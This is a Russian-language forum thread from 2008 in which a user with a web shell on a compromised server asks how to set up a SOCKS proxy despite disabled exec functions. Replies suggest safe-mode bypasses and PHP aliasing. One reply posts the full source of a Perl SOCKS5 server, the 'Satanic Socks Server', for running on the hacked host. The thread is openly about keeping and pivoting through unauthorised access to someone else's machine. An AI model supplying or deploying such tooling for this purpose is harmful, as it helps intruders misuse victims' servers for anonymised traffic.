выполнения команд с выключенными system, exec, etc.

Discussion in 'Уязвимости' started by C[]R3, 22 Apr 2008.

  1. C[]R3

    C[]R3 Elder - Старейшина

    Joined:
    16 Jan 2007
    Messages:
    32
    Likes Received:
    6
    Reputations:
    0
    Имеется веб шелл, необходимо поставить на тачку сокс. Проблема том, что
    php.ini, конфиги апача и других веб демонов найти не удалось. что посоветуете сделать?
     
  2. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    http://www.securityfocus.com в поиск вбиваешь "safe mode"
    http://www.xakep.ru/vulnerability/PHP/

    зы. ты выбрал путь "ПОТРАХАТЬСЯ", ибо найти без сейфа легче ;)
     
    _________________________
    3 people like this.
  3. C[]R3

    C[]R3 Elder - Старейшина

    Joined:
    16 Jan 2007
    Messages:
    32
    Likes Received:
    6
    Reputations:
    0
    прочитал php.ini, safe mode off =/
     
  4. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    PHP-alias.
     
    _________________________
  5. C[]R3

    C[]R3 Elder - Старейшина

    Joined:
    16 Jan 2007
    Messages:
    32
    Likes Received:
    6
    Reputations:
    0
    ну ini_alter() не отключена, но изменять можно только опции с флагом PHP_INI_ALL.. а disable_functions к таковым не относится..
     
  6. C[]R3

    C[]R3 Elder - Старейшина

    Joined:
    16 Jan 2007
    Messages:
    32
    Likes Received:
    6
    Reputations:
    0
    так что посоветуете сделать? :)
     
  7. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    тебе уже посоветовали найти другой сервер, где таких ограничений нет...

    ну или попробуй этот socks поставить...
    Code:
    #!/usr/bin/perl
    
    #                     Satanic Socks Server v0.8.031206-perl
    #    This script is private. Only for SaTaNiC team and friends. Not for sale.
    #                                     Coded by drmist/STNC, web: www.stnc.ru.
    
    $auth_enabled = 0;
    $auth_login = "user";
    $auth_pass = "pass";
    $port = 3003;
    
    use IO::Socket::INET;
    
    $SIG{'CHLD'} = 'IGNORE';
    $bind = IO::Socket::INET->new(Listen=>10, Reuse=>1, LocalPort=>$port) or  die "Can't bind port $port\n";
    
    while($client = $bind->accept()) {
    $client->autoflush();
    
    if(fork()){ $client->close(); }
    else { $bind->close(); new_client($client); exit(); }
    }
    
    sub new_client {
    local $t, $i, $buff, $ord, $success;
    local $client = $_[0];
    sysread($client, $buff, 1);
    
    if(ord($buff) == 5) {
      sysread($client, $buff, 1);
      $t = ord($buff);
    
      unless(sysread($client, $buff, $t) == $t) { return; }
    
      $success = 0;
      for($i = 0; $i < $t; $i++) {
        $ord = ord(substr($buff, $i, 1));
        if($ord == 0 && !$auth_enabled) {
          syswrite($client, "\x05\x00", 2);
          $success++;
          break;
        }
        elsif($ord == 2 && $auth_enabled) {
          unless(do_auth($client)){ return; }
          $success++;
          break;
        }
      }
    
      if($success) {
        $t = sysread($client, $buff, 3);
    
        if(substr($buff, 0, 1) == '\x05') {
          if(ord(substr($buff, 2, 1)) == 0) { # reserved
            ($host, $raw_host) = socks_get_host($client);
            if(!$host) {  return; }
            ($port, $raw_port) = socks_get_port($client);
            if(!$port) { return; }
            $ord = ord(substr($buff, 1, 1));
            $buff = "\x05\x00\x00".$raw_host.$raw_port;
            syswrite($client, $buff, length($buff));
            socks_do($ord, $client, $host, $port);
          }
        }
      } else { syswrite($client, "\x05\xFF", 2); };
    }
    $client->close();
    }
    
    sub do_auth {
    local $buff, $login, $pass;
    local $client = $_[0];
    
    syswrite($client, "\x05\x02", 2);
    sysread($client, $buff, 1);
    
    if(ord($buff) == 1) {
      sysread($client, $buff, 1);
      sysread($client, $login, ord($buff));
      sysread($client, $buff, 1);
      sysread($client, $pass, ord($buff));
    
      if($login eq $auth_login && $pass eq $auth_pass) {
        syswrite($client, "\x05\x00", 2);
        return 1;
      } else { syswrite($client, "\x05\x01", 2); }
    }
    
    $client->close();
    return 0;
    }
    
    sub socks_get_host {
    local $client = $_[0];
    local $t, $ord, $raw_host;
    local $host = "";
    
    sysread($client, $t, 1);
    $ord = ord($t);
    if($ord == 1) {
      sysread($client, $raw_host, 4);
      @host = $raw_host =~ /(.)/g;
      $host = ord($host[0]).".".ord($host[1]).".".ord($host[2]).".".ord($host[3]);
    } elsif($ord == 3) {
      sysread($client, $raw_host, 1);
      sysread($client, $host, ord($raw_host));
      $raw_host .= $host;
    } elsif($ord == 4) {
      #ipv6 - not supported
    }
    
    return ($host, $t.$raw_host);
    }
    
    sub socks_get_port {
    local $client = $_[0];
    local $raw_port, $port;
    sysread($client, $raw_port, 2);
    $port = ord(substr($raw_port, 0, 1)) << 8 | ord(substr($raw_port, 1, 1));
    return ($port, $raw_port);
    }
    
    sub socks_do {
    local($t, $client, $host, $port) = @_;
    
    if($t == 1) { socks_connect($client, $host, $port); }
    elsif($t == 2) { socks_bind($client, $host, $port); }
    elsif($t == 3) { socks_udp_associate($client, $host, $port); }
    else { return 0; }
    
    return 1;
    }
    
    # this part of code was taken from datapipe.pl utility,
    # written by CuTTer (cutter[at]real.xakep.ru)
    # utility lays on cpan.org
    
    sub socks_connect {
    my($client, $host, $port) = @_;
    my $target = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM);
    
    unless($target) { return; }
    
    $target->autoflush();
    while($client || $target) {
      my $rin = "";
      vec($rin, fileno($client), 1) = 1 if $client;
      vec($rin, fileno($target), 1) = 1 if $target;
      my($rout, $eout);
      select($rout = $rin, undef, $eout = $rin, 120);
      if (!$rout  &&  !$eout) { return; }
      my $cbuffer = "";
      my $tbuffer = "";
    
      if ($client && (vec($eout, fileno($client), 1) || vec($rout, fileno($client), 1))) {
        my $result = sysread($client, $tbuffer, 1024);
        if (!defined($result) || !$result) { return; }
      }
    
      if ($target  &&  (vec($eout, fileno($target), 1)  || vec($rout, fileno($target), 1))) {
        my $result = sysread($target, $cbuffer, 1024);
        if (!defined($result) || !$result) { return; }
        }
    
      if ($fh  &&  $tbuffer) { print $fh $tbuffer; }
    
      while (my $len = length($tbuffer)) {
        my $res = syswrite($target, $tbuffer, $len);
        if ($res > 0) { $tbuffer = substr($tbuffer, $res); } else { return; }
      }
    
      while (my $len = length($cbuffer)) {
        my $res = syswrite($client, $cbuffer, $len);
        if ($res > 0) { $cbuffer = substr($cbuffer, $res); } else { return; }
      }
    }
    }
    
    sub socks_bind {
    my($client, $host, $port) = @_;
    # not supported
    }
    
    sub socks_udp_associate {
    my($client, $host, $port) = @_;
    # not supported
    }
     
    #7 aka PSIH, 10 May 2008
    Last edited: 10 May 2008